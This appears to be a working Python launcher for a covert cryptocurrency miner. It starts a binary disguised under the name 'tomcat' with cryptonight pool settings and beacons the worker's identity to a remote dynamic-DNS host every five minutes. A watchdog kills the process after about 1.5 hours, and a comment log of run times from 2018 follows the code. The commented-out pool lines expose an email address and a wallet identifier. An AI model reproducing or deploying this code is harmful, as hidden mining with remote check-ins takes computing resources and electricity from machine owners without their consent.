import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:05.945390
#2018-02-17 16:30:08.519515
#2018-02-17 18:18:07.502243
#2018-02-17 20:06:01.652894
#2018-02-17 21:53:05.508175
#2018-02-17 23:38:07.106616
#2018-02-18 01:27:07.100085
#2018-02-18 03:14:01.782664
#2018-02-18 05:02:06.324912
#2018-02-18 06:55:01.874393
#2018-02-18 08:43:05.002081
#2018-02-18 10:29:01.587021
#2018-02-18 12:14:07.445223
#2018-02-18 14:01:07.583062
#2018-02-18 15:49:07.489087
#2018-02-18 17:39:04.854926
#2018-02-18 19:27:01.535542
#2018-02-18 21:11:06.796574
#2018-02-18 22:57:06.969736
#2018-02-19 00:44:07.123854
#2018-02-19 02:29:06.540893
#2018-02-19 04:16:07.861863
#2018-02-19 05:59:06.456006
#2018-02-19 07:48:05.978455
#2018-02-19 09:38:06.402026
#2018-02-19 11:27:05.916514
#2018-02-19 13:16:05.343729
#2018-02-19 15:05:10.391909
#2018-02-19 16:53:06.120110
#2018-02-19 18:41:06.776489
#2018-02-19 20:28:02.224541
#2018-02-19 22:16:04.636774
#2018-02-20 00:01:01.551954
#2018-02-20 01:48:01.804331
#2018-02-20 03:36:06.913234
#2018-02-20 05:22:07.200804
#2018-02-20 07:06:07.123893
#2018-02-20 08:52:01.225239
#2018-02-20 10:35:10.104245
#2018-02-20 12:22:09.518971
#2018-02-20 14:09:01.682657
#2018-02-20 15:52:13.023287
#2018-02-20 17:39:01.316285
#2018-02-20 19:29:05.666522
#2018-02-20 21:18:05.542432
#2018-02-20 23:03:01.844055
#2018-02-21 00:48:07.818022
#2018-02-21 02:33:07.004585
#2018-02-21 04:23:04.017969
#2018-02-21 06:11:05.377437
#2018-02-21 07:56:08.028912
#2018-02-21 09:42:01.449380
#2018-02-21 11:31:06.589201
#2018-02-21 13:19:04.631956
#2018-02-21 15:05:09.606861
#2018-02-21 16:56:09.157780
#2018-02-21 18:45:09.760878
#2018-02-21 20:33:06.778312
#2018-02-21 22:20:10.136847
#2018-02-22 00:09:07.849214
#2018-02-22 01:57:04.575408
#2018-02-22 03:44:07.087045
#2018-02-22 05:31:03.930261
#2018-02-22 07:16:01.792922
#2018-02-22 09:03:05.618666
#2018-02-22 10:52:08.463069
#2018-02-22 12:39:05.061584
#2018-02-22 14:27:05.112908
#2018-02-22 16:13:10.091252
#2018-02-22 17:59:01.918959
#2018-02-22 19:48:06.650833
#2018-02-22 21:38:01.313240
#2018-02-22 23:24:05.662196
#2018-02-23 01:11:08.124016
#2018-02-23 02:58:03.464822
#2018-02-23 04:45:04.783521
#2018-02-23 06:33:04.807259
#2018-02-23 08:21:02.208040
#2018-02-23 10:37:01.371072
#2018-02-23 12:29:06.846964
#2018-02-23 14:17:02.085707
#2018-02-23 16:10:03.754210
#2018-02-23 17:56:08.017451
#2018-02-23 19:42:05.256953
#2018-02-23 21:26:04.310698
#2018-02-23 23:16:06.847813
#2018-02-24 01:07:02.156165
#2018-02-24 02:57:06.443631
#2018-02-24 04:46:05.908642
#2018-02-24 06:31:01.618958
#2018-02-24 08:19:05.113881
#2018-02-24 10:03:01.739068
#2018-02-24 12:00:10.913930
#2018-02-24 13:47:06.733287
#2018-02-24 15:36:07.302966
#2018-02-24 17:31:03.440370
#2018-02-24 19:17:01.346621
#2018-02-24 21:06:02.234559
#2018-02-25 01:12:06.601921
#2018-02-25 05:02:01.579883
#2018-02-25 09:53:01.680466